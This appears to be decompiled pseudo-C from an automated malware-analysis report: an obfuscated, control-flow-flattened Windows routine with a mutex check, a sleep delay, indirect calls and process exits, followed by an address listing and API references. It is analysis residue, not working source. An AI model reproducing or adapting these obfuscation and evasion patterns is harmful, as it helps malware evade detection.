										_v72 = _t283;
										__eflags =  *((intOrPtr*)(_t285 + 0x10)) - 0xfe02a4;
										_t268 = 0x79849ae;
										_t111 =  >  ? 0xb0b3b626 : 0x2f0fb31e;
									} else {
										__eflags = _t200 - 0xa1a997a0;
										if(_t200 == 0xa1a997a0) {
											_v144 = r13d;
											__eflags = _v144 - 0x1520f;
											_t111 =  <  ? 0xea392f63 : 0x859994e5;
										} else {
											_t111 = _t200;
											__eflags = _t200 - 0xa912c783;
											if(_t200 == 0xa912c783) {
												__eflags =  *_t290;
												_t111 =  ==  ? r14d : 0x170b999c;
											}
										}
									}
									while(1) {
										L2:
										_t200 = _t111;
										if(_t111 > 0xf29a3543) {
											goto L10;
										}
										goto L3;
									}
								}
								__eflags = _t200 - 0x93c76e2d;
								if(_t200 == 0x93c76e2d) {
									_t292 = _v136;
									E00FDA4E4(_t292);
									L107:
									_t111 = 0xb42b969a;
									while(1) {
										L2:
										_t200 = _t111;
										if(_t111 > 0xf29a3543) {
											goto L10;
										}
										goto L3;
									}
									goto L10;
								}
								__eflags = _t200 - 0x945c137a;
								if(_t200 == 0x945c137a) {
									goto L107;
								} else {
									_t111 = _t200;
									__eflags = _t200 - 0x9a2c0e1f;
									if(_t200 == 0x9a2c0e1f) {
										r13d = _v144;
										r13d = r13d + 3;
										_t111 = 0xa1a997a0;
									}
									continue;
								}
							}
							__eflags = _t200 - 0x859994e4;
							if(_t200 > 0x859994e4) {
								__eflags = _t200 - 0x859994e5;
								if(_t200 == 0x859994e5) {
									__eflags = _v152 + _v164 + _v156 - 0xf302e;
									_t111 =  ==  ? 0x6dc18416 : 0x2e98952d;
									continue;
								}
								__eflags = _t200 - 0x91685319;
								if(_t200 == 0x91685319) {
									_t111 = 0xbe5a0f3f;
									continue;
								}
								_t111 = _t200;
								__eflags = _t200 - 0x91ac664b;
								if(_t200 != 0x91ac664b) {
									continue;
								}
								_t292 = _v136;
								__eflags = E00FDA8E0(_t292);
								_t115 = 0x51fb7187;
								L112:
								_t111 =  !=  ? 0xb42b969a : _t115;
								continue;
							}
							__eflags = _t200 - 0x834d46ed;
							if(_t200 == 0x834d46ed) {
								_v152 = (_v156 + 0xfffffffc) * _v164 - _v144 * _v140;
								_v164 = _t292 + _t283 * 2 - _v140 + 0xfffffc19;
								_t261 =  ~(_v152 + _v164) * _v156;
								_v156 = _t292 + _t292 * 2 + _t283 + _t292 * 8 +  ~(_v152 + _v164) * _v156;
								r12d = _v140;
								r12d = r12d + 5;
								_t111 = 0x34527dc1;
								continue;
							}
							__eflags = _t200 - 0x843901b2;
							if(_t200 == 0x843901b2) {
								__eflags = _v148 - 4;
								_t111 =  <  ? 0xe4701c02 : 0x13aae927;
								continue;
							}
							_t111 = _t200;
							__eflags = _t200 - 0x854a966f;
							if(_t200 == 0x854a966f) {
								return _t111;
							} else {
								continue;
							}
						}
						if(_t200 > 0xca288c40) {
							__eflags = _t200 - 0xe4701c01;
							if(_t200 > 0xe4701c01) {
								__eflags = _t200 - 0xe4701c02;
								if(_t200 == 0xe4701c02) {
									__eflags = _v148 - 2;
									_t111 =  <  ? _t268 : 0x91685319;
									continue;
								}
								__eflags = _t200 - 0xea392f63;
								if(_t200 == 0xea392f63) {
									_t111 = 0x34527dc1;
									r12d = 0;
									continue;
								}
								_t111 = _t200;
								__eflags = _t200 - 0xeb6755e2;
								if(_t200 != 0xeb6755e2) {
									continue;
								}
								__eflags = _v148 - 4;
								L96:
								_t111 =  ==  ? _t268 : 0x91685319;
							} else {
								_t111 = r15d;
								__eflags = _t200 - 0xca288c41;
								if(_t200 != 0xca288c41) {
									__eflags = _t200 - 0xd9502225;
									if(_t200 == 0xd9502225) {
										 *_t290 = 0;
										_t111 = 0x701b759;
									} else {
										_t111 = _t200;
										__eflags = _t200 - 0xda537fa7;
										if(_t200 == 0xda537fa7) {
											_t111 = _v92;
										}
									}
								}
							}
							continue;
						}
						if(_t200 > 0xc10a918e) {
							__eflags = _t200 - 0xc10a918f;
							if(_t200 == 0xc10a918f) {
								__eflags = _v148 - 8;
								goto L96;
							}
							__eflags = _t200 - 0xc7704248;
							if(_t200 == 0xc7704248) {
								__eflags = _v160 - 8;
								_t111 =  ==  ? 0x93c76e2d : 0x945c137a;
							} else {
								_t111 = _t200;
								__eflags = _t200 - 0xc88989fd;
								if(_t200 == 0xc88989fd) {
									_t283 = _v80;
									_v160 =  *_t283;
									_t111 = 0x7c8c10e9;
								}
							}
							continue;
						}
						if(_t200 <= 0xbe5a0f3e) {
							__eflags = _t200 - 0xb0b3b626;
							if(_t200 != 0xb0b3b626) {
								_t111 = _t200;
								__eflags = _t200 - 0xb42b969a;
								if(_t200 != 0xb42b969a) {
									continue;
								}
								E00FD3998(_v136);
								E00FE0C45();
								__eflags = 0;
								ExitProcess(??);
							}
							_v120 = _t283;
							r8d = 0x30;
							E00FDC8BC(0, _t283, _v104, _t304, _t306);
							_t261 = 1;
							r8d = 0x27c2b783;
							r9d = 0xd;
							E00FDFAD7(1, _t269, _t283, _v104);
							r8d = 0x30;
							_t292 = 0xfe02a4;
							_t299 = _v112;
							_t268 = 0x79849ae;
							 *_t283();
							_t283 = _v112;
							__eflags =  *((intOrPtr*)(_t283 + 0x28)) - 0x1000000;
							_t111 =  ==  ? 0x48479475 : 0x27daf151;
						} else {
							if(_t200 == 0xbe5a0f3f) {
								_t111 = 0x63da8ac0;
								_v124 = 0x3e8;
							} else {
								_t111 = _t200;
								if(_t200 == 0xbf82bb62) {
									_t111 =  ==  ? 0x91ac664b : 0x945c137a;
								}
							}
						}
						continue;
						L10:
						__eflags = _t200 - 0x2e98952c;
						if(_t200 > 0x2e98952c) {
							__eflags = _t200 - 0x5c545ed3;
							if(_t200 > 0x5c545ed3) {
								__eflags = _t200 - 0x7c8c10e8;
								if(_t200 > 0x7c8c10e8) {
									__eflags = _t200 - 0x7c8c10e9;
									if(_t200 == 0x7c8c10e9) {
										__eflags = _v160 - 2;
										_t111 =  <  ? 0x537690ef : 0xe1b9813;
										continue;
									}
									__eflags = _t200 - 0x7d4a3cd4;
									if(_t200 == 0x7d4a3cd4) {
										_t292 = _v136;
										__eflags = E00FDA504(_t261, _t268, _t271, _t283, _t292, _t305);
										_t115 = 0x91ac664b;
										goto L112;
									}
									_t111 = _t200;
									__eflags = _t200 - 0x7da7801f;
									if(_t200 == 0x7da7801f) {
										__eflags = _v160;
										_t111 =  ==  ? 0x51fb7187 : 0x945c137a;
									}
									continue;
								}
								__eflags = _t200 - 0x5c545ed4;
								if(_t200 == 0x5c545ed4) {
									__eflags = 0;
									r8d = 0x510b3a3e;
									r9d = 0x5c;
									E00FDFAD7(1, _t269, _t283, _t292);
									ExitProcess(??);
								}
								__eflags = _t200 - 0x63da8ac0;
								if(_t200 == 0x63da8ac0) {
									r8d = 0x9d3c7b7a;
									r9d = 0xb2;
									E00FDFAD7(1, _t269, _t283, _t292);
									SleepEx(??, ??); // executed
									_t261 = 0x20;
									E00FD9F06(0x20, _t269, _v136, _t299, _t304, _t306);
									_t299 = _v136 + _t283;
									_t292 = _v136 + _t283;
									__eflags = E00FD3A22(_t283, _t292, _v136 + _t283);
									_t111 =  !=  ? 0x5c545ed4 : 0xc88989fd;
								} else {
									_t111 = _t200;
									__eflags = _t200 - 0x6dc18416;
									if(_t200 == 0x6dc18416) {
										_v152 = _v152 + _v164 - (_v156 << 4);
										_v164 = _v156 + _t292 + _t292 * 2 + 0xffffffb3;
										_t111 = 0x2e98952d;
									}
								}
								continue;
							}
							__eflags = _t200 - 0x48479474;
							if(_t200 > 0x48479474) {
								__eflags = _t200 - 0x48479475;
								if(_t200 == 0x48479475) {
									_t111 = 0x27daf151;
									while(1) {
										L1:
										_v120 = _t292;
										goto L2;
									}
								}
								__eflags = _t200 - 0x51fb7187;
								if(_t200 == 0x51fb7187) {
									_t292 = _v136;
									E00FDC32D(_t261, _t283, _t292, _t306);
									goto L107;
								}
								_t111 = _t200;
								__eflags = _t200 - 0x537690ef;
								if(_t200 == 0x537690ef) {
									__eflags = _v160;
									_t111 =  <=  ? 0x7da7801f : 0x7d4a3cd4;
								}
								continue;
							}
							__eflags = _t200 - 0x2e98952d;
							if(_t200 == 0x2e98952d) {
								E00FDCDB9(0xc40, _t283);
								_v136 = _t283;
								_t292 = _v136;
								_t261 = 0x10;
								E00FD9F06(0x10, _t269, _t292, _t299, _t304, _t306);
								_v80 = _v136 + _t292;
								_t283 = _v80;
								_v148 =  *_t283;
								_t111 = 0x843901b2;
								continue;
							}
							__eflags = _t200 - 0x2f0fb31e;
							if(_t200 == 0x2f0fb31e) {
								_t283 = _v72;
								_t292 = 0xfe02a4;
								__eflags = _t283 - 0xfe02a4;
								_t111 =  <  ? 0xb0b3b626 : 0x27daf151;
								goto L1;
							} else {
								_t111 = _t200;
								__eflags = _t200 - 0x34527dc1;
								if(_t200 == 0x34527dc1) {
									_v140 = r12d;
									__eflags = _v140 - 0x2b4;
									_t111 =  <  ? 0x834d46ed : 0x9a2c0e1f;
								}
								continue;
							}
						}
						__eflags = _t200 - 0x13aae926;
						if(_t200 > 0x13aae926) {
							__eflags = _t200 - 0x18cf248b;
							if(_t200 > 0x18cf248b) {
								__eflags = _t200 - 0x18cf248c;
								if(_t200 == 0x18cf248c) {
									__eflags = _v160 - 0x40;
									_t111 =  ==  ? 0x187c6430 : 0x945c137a;
								} else {
									__eflags = _t200 - 0x27daf151;
									if(_t200 == 0x27daf151) {
										E00FDCC2E(_t283, _v104);
										_t111 = 0xf29a3544;
										_t292 = _v120;
										_t269 = _t200;
									} else {
										_t111 = _t200;
										__eflags = _t200 - 0x28c5e58b;
										if(_t200 == 0x28c5e58b) {
											r13d = 0;
											_v152 = r13d;
											_v164 = r13d;
											_v156 = r13d;
											_t111 = 0xa1a997a0;
										}
									}
								}
								continue;
							}
							__eflags = _t200 - 0x13aae927;
							if(_t200 == 0x13aae927) {
								__eflags = _v148 - 8;
								_t111 =  <  ? 0xeb6755e2 : 0xc10a918f;
								continue;
							}
							__eflags = _t200 - 0x170b999c;
							if(__eflags == 0) {
								E00FDFC4D(_t196, _t261, _t268, _t269, __eflags, _t283, _t292, _t304, _t305, _t306);
								_t111 = _v84;
								continue;
							}
							_t111 = _t200;
							__eflags = _t200 - 0x187c6430;
							if(_t200 != 0x187c6430) {
								continue;
							} else {
								_t261 = 1;
								r8d = 0x510b3a3e;
								r9d = 0x5c;
								E00FDFAD7(1, _t269, _t283, _t292);
								 *_t283();
								goto L107;
							}
						} else {
							__eflags = _t200 - 0x79849ad;
							if(_t200 > 0x79849ad) {
								__eflags = _t200 - 0x79849ae;
								if(_t200 == 0x79849ae) {
									_t111 = 0x63da8ac0;
									_v124 = 0x7530;
								} else {
									__eflags = _t200 - 0xd4e563f;
									if(_t200 == 0xd4e563f) {
										_t269 = 0;
										_t111 = _t271;
									} else {
										_t111 = _t200;
										__eflags = _t200 - 0xe1b9813;
										if(_t200 == 0xe1b9813) {
											__eflags = _v160 - 8;
											_t111 =  <  ? 0xbf82bb62 : 0xfbdae760;
										}
									}
								}
							} else {
								__eflags = _t200 - 0xf29a3544;
								if(_t200 == 0xf29a3544) {
									__eflags = (_t269 ^ 0x000000fe) & sil;
									_t111 =  ==  ? 0x28c5e58b : 0x854a966f;
								} else {
									__eflags = _t200 - 0xfbdae760;
									if(_t200 == 0xfbdae760) {
										__eflags = _v160 - 0x40;
										_t111 =  <  ? 0xc7704248 : 0x18cf248c;
									} else {
										_t111 = _t200;
										__eflags = _t200 - 0x701b759;
										if(_t200 == 0x701b759) {
											_t269 = 0;
											_t111 = _v88;
										}
									}
								}
							}
							continue;
						}
					}
				}
			}



































                                                                                                                                                        0x00fe02a4
                                                                                                                                                        0x00fe02a4
                                                                                                                                                        0x00fe02a4
                                                                                                                                                        0x00fe02a4
                                                                                                                                                        0x00fe02a4
                                                                                                                                                        0x00fe02a4
                                                                                                                                                        0x00fe02a4
                                                                                                                                                        0x00fe02b7
                                                                                                                                                        0x00fe02c6
                                                                                                                                                        0x00fe02cc
                                                                                                                                                        0x00fe02d7
                                                                                                                                                        0x00fe02db
                                                                                                                                                        0x00fe02e6
                                                                                                                                                        0x00fe02e9
                                                                                                                                                        0x00fe02f2
                                                                                                                                                        0x00fe02f6
                                                                                                                                                        0x00fe02fa
                                                                                                                                                        0x00fe0305
                                                                                                                                                        0x00fe0309
                                                                                                                                                        0x00fe030e
                                                                                                                                                        0x00fe0313
                                                                                                                                                        0x00fe0313
                                                                                                                                                        0x00fe0313
                                                                                                                                                        0x00fe0318
                                                                                                                                                        0x00fe0318
                                                                                                                                                        0x00fe0318
                                                                                                                                                        0x00fe031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0321
                                                                                                                                                        0x00fe0327
                                                                                                                                                        0x00fe03d2
                                                                                                                                                        0x00fe03d8
                                                                                                                                                        0x00fe04b1
                                                                                                                                                        0x00fe04b7
                                                                                                                                                        0x00fe0656
                                                                                                                                                        0x00fe065c
                                                                                                                                                        0x00fe0a72
                                                                                                                                                        0x00fe0a77
                                                                                                                                                        0x00fe0a7c
                                                                                                                                                        0x00fe0a81
                                                                                                                                                        0x00fe0a8d
                                                                                                                                                        0x00fe0a93
                                                                                                                                                        0x00fe0a99
                                                                                                                                                        0x00fe0aa0
                                                                                                                                                        0x00fe0aa2
                                                                                                                                                        0x00fe0abe
                                                                                                                                                        0x00fe0ac4
                                                                                                                                                        0x00fe0aca
                                                                                                                                                        0x00fe0acf
                                                                                                                                                        0x00fe0ad8
                                                                                                                                                        0x00fe0ade
                                                                                                                                                        0x00fe0ae4
                                                                                                                                                        0x00fe0aef
                                                                                                                                                        0x00fe0af6
                                                                                                                                                        0x00fe0af9
                                                                                                                                                        0x00fe0b01
                                                                                                                                                        0x00fe0b04
                                                                                                                                                        0x00fe0b13
                                                                                                                                                        0x00fe0662
                                                                                                                                                        0x00fe0662
                                                                                                                                                        0x00fe0668
                                                                                                                                                        0x00fe0b1b
                                                                                                                                                        0x00fe0b24
                                                                                                                                                        0x00fe0b33
                                                                                                                                                        0x00fe066e
                                                                                                                                                        0x00fe066e
                                                                                                                                                        0x00fe0670
                                                                                                                                                        0x00fe0676
                                                                                                                                                        0x00fe067c
                                                                                                                                                        0x00fe0684
                                                                                                                                                        0x00fe0684
                                                                                                                                                        0x00fe0676
                                                                                                                                                        0x00fe0668
                                                                                                                                                        0x00fe0318
                                                                                                                                                        0x00fe0318
                                                                                                                                                        0x00fe0318
                                                                                                                                                        0x00fe031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe031f
                                                                                                                                                        0x00fe0318
                                                                                                                                                        0x00fe04bd
                                                                                                                                                        0x00fe04c3
                                                                                                                                                        0x00fe0931
                                                                                                                                                        0x00fe0936
                                                                                                                                                        0x00fe0b60
                                                                                                                                                        0x00fe0b60
                                                                                                                                                        0x00fe0318
                                                                                                                                                        0x00fe0318
                                                                                                                                                        0x00fe0318
                                                                                                                                                        0x00fe031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe031f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0318
                                                                                                                                                        0x00fe04c9
                                                                                                                                                        0x00fe04cf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe04d5
                                                                                                                                                        0x00fe04d5
                                                                                                                                                        0x00fe04d7
                                                                                                                                                        0x00fe04dd
                                                                                                                                                        0x00fe04e3
                                                                                                                                                        0x00fe04e8
                                                                                                                                                        0x00fe04ec
                                                                                                                                                        0x00fe04ec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe04dd
                                                                                                                                                        0x00fe04cf
                                                                                                                                                        0x00fe03de
                                                                                                                                                        0x00fe03e4
                                                                                                                                                        0x00fe05e8
                                                                                                                                                        0x00fe05ee
                                                                                                                                                        0x00fe0a2b
                                                                                                                                                        0x00fe0a3a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0a3a
                                                                                                                                                        0x00fe05f4
                                                                                                                                                        0x00fe05fa
                                                                                                                                                        0x00fe0a42
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0a42
                                                                                                                                                        0x00fe0600
                                                                                                                                                        0x00fe0602
                                                                                                                                                        0x00fe0608
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe060e
                                                                                                                                                        0x00fe0618
                                                                                                                                                        0x00fe061a
                                                                                                                                                        0x00fe0bc8
                                                                                                                                                        0x00fe0bcd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0bcd
                                                                                                                                                        0x00fe03ea
                                                                                                                                                        0x00fe03f0
                                                                                                                                                        0x00fe085c
                                                                                                                                                        0x00fe087f
                                                                                                                                                        0x00fe08a1
                                                                                                                                                        0x00fe08af
                                                                                                                                                        0x00fe08b3
                                                                                                                                                        0x00fe08b8
                                                                                                                                                        0x00fe08bc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe08bc
                                                                                                                                                        0x00fe03f6
                                                                                                                                                        0x00fe03fc
                                                                                                                                                        0x00fe08ca
                                                                                                                                                        0x00fe08d7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe08d7
                                                                                                                                                        0x00fe0402
                                                                                                                                                        0x00fe0404
                                                                                                                                                        0x00fe040a
                                                                                                                                                        0x00fe0c2a
                                                                                                                                                        0x00fe0410
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0410
                                                                                                                                                        0x00fe040a
                                                                                                                                                        0x00fe0333
                                                                                                                                                        0x00fe0473
                                                                                                                                                        0x00fe0479
                                                                                                                                                        0x00fe0624
                                                                                                                                                        0x00fe062a
                                                                                                                                                        0x00fe0a50
                                                                                                                                                        0x00fe0a58
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0a58
                                                                                                                                                        0x00fe0630
                                                                                                                                                        0x00fe0636
                                                                                                                                                        0x00fe0a60
                                                                                                                                                        0x00fe0a65
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0a65
                                                                                                                                                        0x00fe063c
                                                                                                                                                        0x00fe063e
                                                                                                                                                        0x00fe0644
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe064e
                                                                                                                                                        0x00fe09f9
                                                                                                                                                        0x00fe09fe
                                                                                                                                                        0x00fe047f
                                                                                                                                                        0x00fe047f
                                                                                                                                                        0x00fe0482
                                                                                                                                                        0x00fe0488
                                                                                                                                                        0x00fe048e
                                                                                                                                                        0x00fe0494
                                                                                                                                                        0x00fe0924
                                                                                                                                                        0x00fe0927
                                                                                                                                                        0x00fe049a
                                                                                                                                                        0x00fe049a
                                                                                                                                                        0x00fe049c
                                                                                                                                                        0x00fe04a2
                                                                                                                                                        0x00fe04a8
                                                                                                                                                        0x00fe04a8
                                                                                                                                                        0x00fe04a2
                                                                                                                                                        0x00fe0494
                                                                                                                                                        0x00fe0488
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0479
                                                                                                                                                        0x00fe033f
                                                                                                                                                        0x00fe05ad
                                                                                                                                                        0x00fe05b3
                                                                                                                                                        0x00fe09f6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe09f6
                                                                                                                                                        0x00fe05b9
                                                                                                                                                        0x00fe05bf
                                                                                                                                                        0x00fe0a0a
                                                                                                                                                        0x00fe0a17
                                                                                                                                                        0x00fe05c5
                                                                                                                                                        0x00fe05c5
                                                                                                                                                        0x00fe05c7
                                                                                                                                                        0x00fe05cd
                                                                                                                                                        0x00fe05d3
                                                                                                                                                        0x00fe05da
                                                                                                                                                        0x00fe05de
                                                                                                                                                        0x00fe05de
                                                                                                                                                        0x00fe05cd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe05bf
                                                                                                                                                        0x00fe034b
                                                                                                                                                        0x00fe0788
                                                                                                                                                        0x00fe078e
                                                                                                                                                        0x00fe0bd5
                                                                                                                                                        0x00fe0bd7
                                                                                                                                                        0x00fe0bdd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0c30
                                                                                                                                                        0x00fe0c37
                                                                                                                                                        0x00fe0c3c
                                                                                                                                                        0x00fe0c3e
                                                                                                                                                        0x00fe0c3e
                                                                                                                                                        0x00fe079b
                                                                                                                                                        0x00fe07a0
                                                                                                                                                        0x00fe07a8
                                                                                                                                                        0x00fe07b4
                                                                                                                                                        0x00fe07b9
                                                                                                                                                        0x00fe07bf
                                                                                                                                                        0x00fe07c5
                                                                                                                                                        0x00fe07ca
                                                                                                                                                        0x00fe07d0
                                                                                                                                                        0x00fe07d7
                                                                                                                                                        0x00fe07da
                                                                                                                                                        0x00fe07df
                                                                                                                                                        0x00fe07e1
                                                                                                                                                        0x00fe07e6
                                                                                                                                                        0x00fe07f7
                                                                                                                                                        0x00fe0351
                                                                                                                                                        0x00fe0357
                                                                                                                                                        0x00fe07ff
                                                                                                                                                        0x00fe0804
                                                                                                                                                        0x00fe035d
                                                                                                                                                        0x00fe035d
                                                                                                                                                        0x00fe0365
                                                                                                                                                        0x00fe0378
                                                                                                                                                        0x00fe0378
                                                                                                                                                        0x00fe0365
                                                                                                                                                        0x00fe0357
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe037d
                                                                                                                                                        0x00fe037d
                                                                                                                                                        0x00fe0383
                                                                                                                                                        0x00fe0415
                                                                                                                                                        0x00fe041b
                                                                                                                                                        0x00fe054c
                                                                                                                                                        0x00fe0552
                                                                                                                                                        0x00fe074b
                                                                                                                                                        0x00fe0751
                                                                                                                                                        0x00fe0ba2
                                                                                                                                                        0x00fe0baf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0baf
                                                                                                                                                        0x00fe0757
                                                                                                                                                        0x00fe075d
                                                                                                                                                        0x00fe0bb7
                                                                                                                                                        0x00fe0bc1
                                                                                                                                                        0x00fe0bc3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0bc3
                                                                                                                                                        0x00fe0763
                                                                                                                                                        0x00fe0765
                                                                                                                                                        0x00fe076b
                                                                                                                                                        0x00fe0771
                                                                                                                                                        0x00fe0780
                                                                                                                                                        0x00fe0780
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe076b
                                                                                                                                                        0x00fe0558
                                                                                                                                                        0x00fe055e
                                                                                                                                                        0x00fe0967
                                                                                                                                                        0x00fe096e
                                                                                                                                                        0x00fe0974
                                                                                                                                                        0x00fe097a
                                                                                                                                                        0x00fe0984
                                                                                                                                                        0x00fe0984
                                                                                                                                                        0x00fe0564
                                                                                                                                                        0x00fe056a
                                                                                                                                                        0x00fe0997
                                                                                                                                                        0x00fe099d
                                                                                                                                                        0x00fe09a3
                                                                                                                                                        0x00fe09ae
                                                                                                                                                        0x00fe09b5
                                                                                                                                                        0x00fe09ba
                                                                                                                                                        0x00fe09c9
                                                                                                                                                        0x00fe09d6
                                                                                                                                                        0x00fe09de
                                                                                                                                                        0x00fe09ea
                                                                                                                                                        0x00fe0570
                                                                                                                                                        0x00fe0570
                                                                                                                                                        0x00fe0572
                                                                                                                                                        0x00fe0578
                                                                                                                                                        0x00fe058b
                                                                                                                                                        0x00fe059f
                                                                                                                                                        0x00fe05a3
                                                                                                                                                        0x00fe05a3
                                                                                                                                                        0x00fe0578
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe056a
                                                                                                                                                        0x00fe0421
                                                                                                                                                        0x00fe0427
                                                                                                                                                        0x00fe06cc
                                                                                                                                                        0x00fe06d2
                                                                                                                                                        0x00fe0c0b
                                                                                                                                                        0x00fe0313
                                                                                                                                                        0x00fe0313
                                                                                                                                                        0x00fe0313
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0313
                                                                                                                                                        0x00fe0313
                                                                                                                                                        0x00fe06d8
                                                                                                                                                        0x00fe06de
                                                                                                                                                        0x00fe0b56
                                                                                                                                                        0x00fe0b5b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0b5b
                                                                                                                                                        0x00fe06e4
                                                                                                                                                        0x00fe06e6
                                                                                                                                                        0x00fe06ec
                                                                                                                                                        0x00fe06f2
                                                                                                                                                        0x00fe0701
                                                                                                                                                        0x00fe0701
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe06ec
                                                                                                                                                        0x00fe042d
                                                                                                                                                        0x00fe0433
                                                                                                                                                        0x00fe08e4
                                                                                                                                                        0x00fe08e9
                                                                                                                                                        0x00fe08ee
                                                                                                                                                        0x00fe08f3
                                                                                                                                                        0x00fe08f8
                                                                                                                                                        0x00fe090a
                                                                                                                                                        0x00fe090f
                                                                                                                                                        0x00fe0916
                                                                                                                                                        0x00fe091a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe091a
                                                                                                                                                        0x00fe0439
                                                                                                                                                        0x00fe043f
                                                                                                                                                        0x00fe0be5
                                                                                                                                                        0x00fe0bed
                                                                                                                                                        0x00fe0bf4
                                                                                                                                                        0x00fe0c01
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0445
                                                                                                                                                        0x00fe0445
                                                                                                                                                        0x00fe0447
                                                                                                                                                        0x00fe044d
                                                                                                                                                        0x00fe0453
                                                                                                                                                        0x00fe045c
                                                                                                                                                        0x00fe046b
                                                                                                                                                        0x00fe046b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe044d
                                                                                                                                                        0x00fe043f
                                                                                                                                                        0x00fe0389
                                                                                                                                                        0x00fe038f
                                                                                                                                                        0x00fe04f6
                                                                                                                                                        0x00fe04fc
                                                                                                                                                        0x00fe0709
                                                                                                                                                        0x00fe070f
                                                                                                                                                        0x00fe0b6e
                                                                                                                                                        0x00fe0b7b
                                                                                                                                                        0x00fe0715
                                                                                                                                                        0x00fe0715
                                                                                                                                                        0x00fe071b
                                                                                                                                                        0x00fe0b88
                                                                                                                                                        0x00fe0b8d
                                                                                                                                                        0x00fe0b92
                                                                                                                                                        0x00fe0b97
                                                                                                                                                        0x00fe0721
                                                                                                                                                        0x00fe0721
                                                                                                                                                        0x00fe0723
                                                                                                                                                        0x00fe0729
                                                                                                                                                        0x00fe072f
                                                                                                                                                        0x00fe0732
                                                                                                                                                        0x00fe0737
                                                                                                                                                        0x00fe073c
                                                                                                                                                        0x00fe0741
                                                                                                                                                        0x00fe0741
                                                                                                                                                        0x00fe0729
                                                                                                                                                        0x00fe071b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe070f
                                                                                                                                                        0x00fe0502
                                                                                                                                                        0x00fe0508
                                                                                                                                                        0x00fe0944
                                                                                                                                                        0x00fe0951
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0951
                                                                                                                                                        0x00fe050e
                                                                                                                                                        0x00fe0514
                                                                                                                                                        0x00fe0959
                                                                                                                                                        0x00fe095e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe095e
                                                                                                                                                        0x00fe051a
                                                                                                                                                        0x00fe051c
                                                                                                                                                        0x00fe0522
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0528
                                                                                                                                                        0x00fe052a
                                                                                                                                                        0x00fe052f
                                                                                                                                                        0x00fe0535
                                                                                                                                                        0x00fe053b
                                                                                                                                                        0x00fe0545
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe0545
                                                                                                                                                        0x00fe0395
                                                                                                                                                        0x00fe0395
                                                                                                                                                        0x00fe039b
                                                                                                                                                        0x00fe068d
                                                                                                                                                        0x00fe0693
                                                                                                                                                        0x00fe0b3b
                                                                                                                                                        0x00fe0b40
                                                                                                                                                        0x00fe0699
                                                                                                                                                        0x00fe0699
                                                                                                                                                        0x00fe069f
                                                                                                                                                        0x00fe0b4d
                                                                                                                                                        0x00fe0b4f
                                                                                                                                                        0x00fe06a5
                                                                                                                                                        0x00fe06a5
                                                                                                                                                        0x00fe06a7
                                                                                                                                                        0x00fe06ad
                                                                                                                                                        0x00fe06b7
                                                                                                                                                        0x00fe06c4
                                                                                                                                                        0x00fe06c4
                                                                                                                                                        0x00fe06ad
                                                                                                                                                        0x00fe069f
                                                                                                                                                        0x00fe03a1
                                                                                                                                                        0x00fe03a1
                                                                                                                                                        0x00fe03a7
                                                                                                                                                        0x00fe0815
                                                                                                                                                        0x00fe0822
                                                                                                                                                        0x00fe03ad
                                                                                                                                                        0x00fe03ad
                                                                                                                                                        0x00fe03b3
                                                                                                                                                        0x00fe082e
                                                                                                                                                        0x00fe083b
                                                                                                                                                        0x00fe03b9
                                                                                                                                                        0x00fe03b9
                                                                                                                                                        0x00fe03bb
                                                                                                                                                        0x00fe03c1
                                                                                                                                                        0x00fe03c7
                                                                                                                                                        0x00fe03c9
                                                                                                                                                        0x00fe03c9
                                                                                                                                                        0x00fe03c1
                                                                                                                                                        0x00fe03b3
                                                                                                                                                        0x00fe03a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fe039b
                                                                                                                                                        0x00fe038f
                                                                                                                                                        0x00fe0318

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00FDCDB9: RtlAllocateHeap.NTDLL(?,9FD7756B,079849AE,0701B759,?,00FE0A77), ref: 00FDCE20
                                                                                                                                                        • ExitProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,FD91BC21), ref: 00FE0984
                                                                                                                                                        • SleepEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,FD91BC21), ref: 00FE09AE
                                                                                                                                                          • Part of subcall function 00FD3A22: CreateMutexExA.KERNEL32(?,?,?,079849AE,0701B759,00FE09DE), ref: 00FD3A4E
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00FE0C3E
